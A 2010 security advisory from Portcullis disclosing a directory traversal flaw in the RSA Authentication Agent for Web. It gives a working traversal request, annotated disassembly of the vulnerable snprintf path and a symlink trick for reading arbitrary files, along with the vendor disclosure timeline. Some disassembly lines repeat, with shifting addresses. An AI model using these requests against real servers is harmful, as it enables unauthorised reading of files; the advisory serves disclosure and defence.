Tried, Tested and Proven

Security Advisory 10-001 – mod_rsawebagent Is Vulnerable To Directory Traversal


Vulnerability Title:

mod_rsawebagent Is Vulnerable To Directory Traversal


Vulnerable System:

RSA Authentication Agent for Web

Vulnerability discovery and development:

Portcullis Security Testing Services.Further research was then carried out and the vendor notified.

Credit for Discovery:

Tim Brown – Portcullis Computer Security Ltd.

Affected systems:

All known versions of RSA Authentication Agent for Web for Apache Web Server; the vulnerability was confirmed on mod_rsawebagent/7.0.0[315]. The vendor subsequently confirmed that both RSA Authentication Agent 7.0 for Web for Apache Web Server and RSA Authentication Agent 7.0 for Web for Internet Information Services are affected. The vendor was unable to reproduce this issue on older releases.

Details:

RSA Authentication Agent for Web for Apache Web Server allows you to protect all or selected web pages with RSA SecurID. The agent residing on a web server, intercepts all user requests for protected web pages. When a user attempts to access a URL that RSA SecurID protects, the agent requests the username and passcode and passes them to RSA Authentication Manager for authentication. If the authentication is successful, the agent stores the information in a cookie in the user’s browser. As long as the cookie remains valid, the user is granted access to protected web pages.

It is possible to pass a value in the GetPic-image parameter of requests to the web authentication URL handler which causes arbitrary files with the .jpg extention to be returned from outside the web root as follows:

               
GET /webauthentication?GetPic?image=../../../../../../../usr/share/cups/doc-root/images/smiley HTTP/1.0
 

The value of the parameter is first URL decoded and then used as an argument to snprintf with a format string of “%s/%s.%s” within the CHTMLString::GetDefaultTemplate method:

                                                        
CHTMLString::GetDefaultTemplate(char const*image, char const*arg1, unsigned int*root):
   0x00007f62edba638a <+0>:     mov    %rbx,-0x30(%rsp)
   0x00007f62edba638f <+5>:     mov    %rbp,-0x28(%rsp)
   0x00007f62edba6394 <+10>:    mov    %r12,-0x20(%rsp)
   0x00007f62edba6399 <+15>:    mov    %r13,-0x18(%rsp)
   0x00007f62edba639e <+20>:    mov    %r14,-0x10(%rsp)
   0x00007f62edba63a3 <+25>:    mov    %r15,-0x8(%rsp)
   0x00007f62edba63a8 <+30>:    sub    $0x558,%rsp
   0x00007f62edba63af <+37>:    mov    %rdi,%r14 ; set $r14 to $rdi (arg1)
   0x00007f62edba63b2 <+40>:    mov    %rsi,%rbx ; set $rbx to $rsi (image)
   0x00007f62edba63b5 <+43>:    mov    %rdx,%r12 ; set $r12 to $rdx (root)
   0x00007f62edba63b8 <+46>:    mov    %rcx,%r15 ; set $r15 to $rcx (arg3)
   0x00007f62edba63bb <+49>:    lea    0x20e69(%rip),%r8  ; set $r8 (arg4) to "Entering GetDefaultTemplate()"
   0x00007f62edba63c2 <+56>:    mov    $0x486,%ecx ; $ecx (arg3) = 1158
   0x00007f62edba63c7 <+61>:    lea    0x20dee(%rip),%rdx ; set $rdx (arg2) to "genhtml.cpp"
   0x00007f62edba63ce <+68>:    mov    $0x9,%esi ; $esi (arg1) = 9
   0x00007f62edba63d3 <+73>:    mov    $0x2,%edi ; $edi (arg0) = 2
   0x00007f62edba63d8 <+78>:    mov    $0x0,%eax ; $eax = 0
   0x00007f62edba63dd <+83>:    callq  0x7f62edb7d818  ; SDTraceMessage(2, 9, "genhtml.cpp", 1158, "Entering GetDefaultTemplate()");
   0x00007f62edba63e2 <+88>:    lea    0x10(%rsp),%rbp ; set $rbp to ""
   0x00007f62edba63e7 <+93>:    mov    0x20(%r14),%r9 ; set $r9 (args2) to "jpg" (from arg1)
   0x00007f62edba63eb <+97>:    mov    %rbx,%r8 ; set $r8 (args1) to "../../../../../../../usr/share/cups/doc-root/images/smiley" (from image)
   0x00007f62edba63ee <+100>:   mov    %r12,%rcx ; set $rcx (args0) to "/opt/apache2/rsawebagent/Templates" (from root)
   0x00007f62edba63f1 <+103>:   lea    0x20eb6(%rip),%rdx ; set $rdx (format) to "%s/%s.%s"
   0x00007f62edba63f8 <+110>:   mov    $0x400,%esi ; $esi (size) = 1024
   0x00007f62edba63fd <+115>:   mov    %rbp,%rdi ; set $rdi (str) to ""
   0x00007f62edba6400 <+118>:   mov    $0x0,%eax ; $eax (nwritten) = 0
=> 0x00007f62edba6405 <+123>:   callq  0x7f62edb7cee8 <snprintf@plt> ; snprintf(str, 1024, "%s/%s.%s", "/opt/apache2/rsawebagent/Templates", "../../../../../../../usr/share/cups/doc-root/images/smiley", "jpg");
   0x00007f62edba640a <+128>:   dec    %eax ; $eax --
   0x00007f62edba640c <+130>:   cmp    $0x3fe,%eax ; is 1022 <= $eax (nwritten) 
   0x00007f62edba6411 <+135>:   jbe    0x7f62edba644f <_zn11chtmlstring18getdefaulttemplateepkcs1_pj+197>
   0x00007fbb34042413 <+137>:   movb   $0x0,0x40f(%rsp) ; 0x40f(%rsp) = 0
   0x00007fbb3404241b <+145>:   mov    %rbp,%r9 ; set $r9 (args5) to $rbp (str)
   0x00007fbb3404241e <+148>:   lea    0x213c3(%rip),%r8 ; set $r8 (arg4) to "Leaving GetDefaultTemplate(), buffer overflow for template %s"
   0x00007fbb34042425 <+155>:   mov    $0x492,%ecx ; $ecx (arg3) = 1170
   0x00007fbb3404242a <+160>:   lea    0x20d8b(%rip),%rdx ; set $rdx (arg2) to "genhtml.cpp"
   0x00007fbb34042431 <+167>:   mov    $0x9,%esi ; $esi (arg1) = 9
   0x00007fbb34042436 <+172>:   mov    $0x4,%edi ; $edi (arg0) = 4
   0x00007fbb3404243b <+177>:   mov    $0x0,%eax ; $eax = 0
   0x00007fbb34042440 <+182>:   callq  0x7fbb34019818
   0x00007fbb34042431 <+167>:   mov    $0x9,%esi ; $esi (arg1) = 9
   0x00007fbb34042436 <+172>:   mov    $0x4,%edi ; $edi (arg0) = 4
   0x00007fbb3404243b <+177>:   mov    $0x0,%eax ; $eax = 0
   0x00007fbb34042440 <+182>:   callq  0x7fbb34019818  ; SDTraceMessage(2, 9, "genhtml.cpp", 1170, "Leaving GetDefaultTemplate(), buffer overflow for template %s", "/opt/apache2/rsawebagent/Templates/../../../../../../usr/share/cups/doc-root/images/smiley.jpg");
   0x00007fbb34042445 <+187>:   mov    $0x0,%eax ; $eax = 0
  ...
                                   

This results in /opt/apache2/rsawebagent/Templates/../../../../../../usr/share/cups/doc-root/images/smiley.jpg being returned. The path is then stat’d to confirm its existence before it is passed to CHTMLString::ReadTemplate which opens, stats and then reads the file to freshly allocated memory. Note that no credentials are required to perform this attack.

A user with access to the underlying host either via a normal shell or for example by sftp can extend this attack by creating a hard or symbolic link from any file accessible by the web server user to any location to which they have write access with the .jpg extension in order to read it.

Interestingly, if $eax is greater or equal to 1022 after the initial snprintf, then the code detects this as a potential buffer overflow and logs an error before returning. At a guess, the code used to use sprintf, which was a primitive attempt to catch stack overflows.

In the process of researching this vulnerability, two further undocumented parameters GetFile?file and GetStyleSheet?style were identified which to have the same issue. Whilst the former sounds useful, in practice, it was determined that GetFile can only be used to access files with the .htm extension. Moreover both undocumented parameters required valid credentials to access their functionality in the agents default configuration.

Impact:

An attacker could cause access to arbitrary files.

Exploit:

Exploit code is not required.

Vendor status:

05/07/2010 – Vendor informed via email

07/07/2010 – vendor responds confirming receipt and requesting further information about platform on which the issue was discovered

14/07/2010 – vendor confirms the issue and commits to provide an update in due course

30/07/2010 – vendor suggests disclosure date of 20/09/2010

10/09/2010 – vendor confirms disclosure date of 20/09/2010 and informs Portcullis that CVE-2010-3261 has been assigned to this issue

21/09/2010 – Vendor confirms they release the patch and advisory to their customers on 20/09/2010

22/09/2010 – Publication

Copyright:

Copyright © Portcullis Computer Security Limited 2010, All rights reserved worldwide.
Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.